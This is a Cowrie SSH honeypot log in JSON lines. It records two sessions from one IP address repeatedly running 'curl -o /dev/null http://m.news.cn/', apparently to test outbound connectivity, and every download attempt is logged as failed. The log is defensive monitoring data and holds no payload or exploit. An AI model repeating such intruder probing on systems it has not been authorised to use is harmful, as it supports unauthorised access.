{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:12.732125Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:12.734053Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:12.736578Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:12.738855Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:12.739948Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:12.771653Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:12.773215Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:12.779324Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:12.780330Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:12.782982Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:12.783913Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:12.821340Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:12.822398Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:12.824750Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:12.826283Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:12.828243Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:12.829002Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:12.859718Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:12.860762Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:12.865878Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:12.866911Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:12.886863Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:12.888374Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:12.927687Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:12.928566Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:12.944417Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:12.945836Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:12.996520Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:13.017405Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:13.039930Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:13.070642Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:13.072225Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:13.091613Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:13.092753Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:13.116982Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:13.130159Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:13.131399Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:13.139217Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:13.168808Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:13.170739Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:13.173254Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:13.174078Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:13.176824Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:13.177626Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:13.209698Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:13.211200Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:13.213153Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:13.214346Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:13.218874Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:13.219861Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:13.251465Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:13.253029Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:13.256823Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:13.258243Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:13.263186Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:13.264676Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:13.293945Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:13.295094Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:13.301764Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:13.302862Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:13.335349Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:13.336416Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:13.346137Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:13.347123Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:13.375468Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:13.376554Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:13.388093Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:13.389125Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:13.398770Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:13.400005Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:13.451257Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:13.453057Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:13.491579Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:13.492664Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:13.494299Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:13.496113Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:13.504864Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:13.505957Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:13.534553Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:13.536716Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:13.539657Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:13.540667Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:13.560813Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:13.561850Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:13.583014Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:13.584371Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:13.611184Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:13.612252Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:13.627955Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:13.629390Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:13.634597Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:13.635643Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:13.665553Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:13.666735Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:13.669368Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:13.672148Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:13.686145Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:13.687244Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:13.711185Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:13.712515Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:13.723328Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:13.724445Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:13.748002Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:13.749042Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:13.752485Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:13.755310Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:13.769636Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:13.771105Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:13.793265Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:13.794622Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:13.796575Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:13.830275Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:13.831161Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:13.859207Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:13.860424Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:13.892878Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:13.894080Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:13.898134Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:13.933189Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:13.934431Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:13.955512Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:13.957370Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:13.994971Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:13.996731Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:14.009422Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:14.010918Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:14.049266Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
